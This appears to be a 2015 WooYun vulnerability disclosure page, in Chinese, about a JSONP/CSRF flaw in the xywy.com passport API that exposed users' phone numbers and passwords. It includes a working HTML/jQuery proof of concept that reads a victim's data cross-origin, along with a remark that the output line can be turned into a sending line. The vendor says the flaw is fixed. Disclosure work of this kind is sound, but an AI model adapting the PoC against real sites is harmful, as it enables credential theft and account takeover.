当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0123836

漏洞标题:寻医问药接口验证不严可劫持获取任意用户手机号、密码

相关厂商:寻医问药

漏洞作者: jeary

提交时间:2015-07-01 08:34

修复时间:2015-08-11 14:27

公开时间:2015-08-11 14:27

漏洞类型:CSRF

危害等级:高

自评Rank:10

漏洞状态:厂商已经修复

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-07-01: 细节已通知厂商并且等待厂商处理中
2015-07-01: 厂商已经确认,细节仅向厂商公开
2015-07-11: 细节向核心白帽子及相关领域专家公开
2015-07-21: 细节向普通白帽子公开
2015-07-31: 细节向实习白帽子公开
2015-08-11: 厂商已经修复漏洞并主动公开,细节向公众公开

简要描述:

我也不知道为什么密码会出现在json里!

详细说明:

抓包时,过滤搜索到了这个接口

http://api.passport.xywy.com/n_userHeaderGet.php?callback=1&a=u&uid=60356754


x1.jpg


手机号、邮箱、密码、注册日期...全部在里面(PS:我没绑定邮箱)
不过这个接口有一个麻烦点,其中有一个uid参数,尝试去掉uid访问,结果为空。也就是说,查询了当前的uid并且验证了cookie,无法越权。
但是这并不影响,此问题可以达到指哪打哪的效果,只是需要交互,然而这并不难。

x2.jpg


你可以任意挑选一个人审查元素得到他的uid构造链接。
POC:(PS:测试POC需要将uid改成自己或需要攻击的人)
真实场景下,将输出语句改成发送语句即可~~

<!DOCTYPE html>
<html>
<head>
<script src="https://code.jquery.com/jquery-1.9.1.min.js"></script>
<meta charset="GBK">
<title>POC</title>
</head>
<body>
<p>result:</p>
<script>
$.getJSON('http://api.passport.xywy.com//n_userHeaderGet.php?a=u&uid=60356754&callback=?',function(json){
document.body.appendChild(document.createElement('p')).innerHTML=json.username+"<br/>"+json.insert_data+"<br/>"+json.userphone+"<br/>"+json.passwd;
})
</script>
</body>
</html>


漏洞证明:

x3.jpg


获取的密码可以成功登陆他人账号,导致用户敏感信息,健康档案、曾咨询的病情等。
危害较大,求不小厂商。

修复方案:

瘦子快给我发礼物!

版权声明:转载请注明来源 jeary@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:14

确认时间:2015-07-01 09:16

厂商回复:

感谢jeary小骚年近日来对寻医问药网的支持,定向csrf攻击成本个人认为还是很高的,但因为涉及到重要数据,所以给高危。

最新状态:

2015-08-11:漏洞已修复。